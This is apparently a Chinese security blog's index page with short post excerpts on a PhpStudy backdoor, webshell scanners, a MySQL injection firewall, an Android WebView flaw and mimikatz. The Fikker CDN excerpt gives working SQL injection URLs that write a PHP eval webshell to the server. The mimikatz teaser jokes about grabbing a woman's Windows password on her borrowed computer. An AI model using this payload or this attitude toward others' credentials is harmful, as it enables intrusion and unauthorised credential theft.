jincon 发表于 2019-09-22, 1:09 PM
9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文中,很有爆炸,一看,握草,“PhpStudy软件”遭到黑客篡改并植入“后门”,真是防不慎防啊。
再次真诚建议,特么的不要再使用phpstudy这个渣渣玩意。
据监测发现,被篡改的软件版本并不单单是官方通告的PhpStudy2016版本中的php5.4版本,而是在PhpStudy 2016版和2018版两个版本中均同时被发现有“后门”文件的存在,并且影响部分使用PhpStudy搭建的PHP5.2、PHP5.3和PHP5.4环境。
分析过程:
对比官网的xmlrpc源代码可以知道,默认xmplrpc模块的几个初始化函数都是被设置为:
而污染过的版本中“request_startup_func”函数被恶意攻击者自定义:
» 阅读全文
jincon 发表于 2018-12-31, 10:10 PM
Fikker 是一款面向 CDN/站长 的专业级网站缓存(Webcache)和反向代理服务器软件(Reversed Proxy Server)。近日在一起安全事件中发现fikker主控多个php文件存在高危注入漏洞,可获取Webshell
#爆目录
admin_modify.php?id=-1%20union%20select%201,
@@basedir,3,4,5,6,7,8,9,10,11,12,13
#写一句话
admin_modify.php?id=1%20and%201=2%20union%20
select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,
0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27
jincon 发表于 2017-03-20, 10:37 AM
使用 X-Frame-Options
X-Frame-Options 有三个值:
» 阅读全文
jincon 发表于 2016-02-18, 11:35 AM
分享几个常用的web杀毒查杀后门软件,感觉还不错,对于网上一些下载的源码不放心的,
可以下载之后,扫扫哈。。。
360网站安全在线木马后门扫描查云杀平台
http://safe.webscan.360.cn/
D盾的web查杀。
http://www.d99net.net/News.asp?id=62
暗组的web杀毒
http://www.fsg2.org/archives/18/
护卫神web杀毒:
http://www.huweishen.com/soft/kill/
linux python版webshell智能查杀程序-SeayFindShell
http://www.cnseay.com/3984/
需要python 2.7 支持。
jincon 发表于 2015-07-18, 7:20 PM
SQLassie是一款免费的MySQL数据库防火墙,可以实时阻断SQL注入攻击。SQLassie采用了Bayesian算法发现异常的SQL请求,相当的高效。
使用方式
SQLassie目前仅支持MySQL,开始使用前,你需要配置SQLassie以连接MySql数据库;启动后,SQLassie会在不同端口进行监听并保护数据库。
S1:启动SQLassie
./sqlassie -s /var/run/mysql/mysqld.sock -l 3307
S2:配置MediaWiki的配置文件LocalSettings.php,连接3307端口
$wgDBServer = "127.0.0.1:3307"
注意:这里不能使用localhost
jincon 发表于 2015-06-08, 9:41 AM
【基础知识】
webview是Android用于浏览网页的组件,它的接口函数addJavascriptInterface可以实现网页JS与本地JAVA的交互,但是没有限制已注册JAVA类的方法调用,导致可以利用反射机制调用未注册的其它任何JAVA类。
当Android用户访问恶意网页时,会被迫执行系统命令,如安装木马、盗取敏感数据等。
【漏洞重现】
构建一个使用Webview组件的程序,
1)AndroidManifest.xml添加网络访问权限
» 阅读全文
jincon 发表于 2014-07-09, 1:20 PM
女神,借用电脑一看可否?我要mimikatz抓取你的windows密码
“女神,借用电脑一看可否?”
mimikatz是法国一个牛B的人写的轻量级调试器,
mimikatz 最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新 功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP) 的登陆认证。建议默认禁止RestrictedAdmin模式登录。更多功能等着大家来发现
» 阅读全文
| « 2019年10月 » | ||||||
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 | 31 | ||
(41) (68) (42) (143) (11) (4) (2) (11) (30) (14) (62) (18) (4) (26)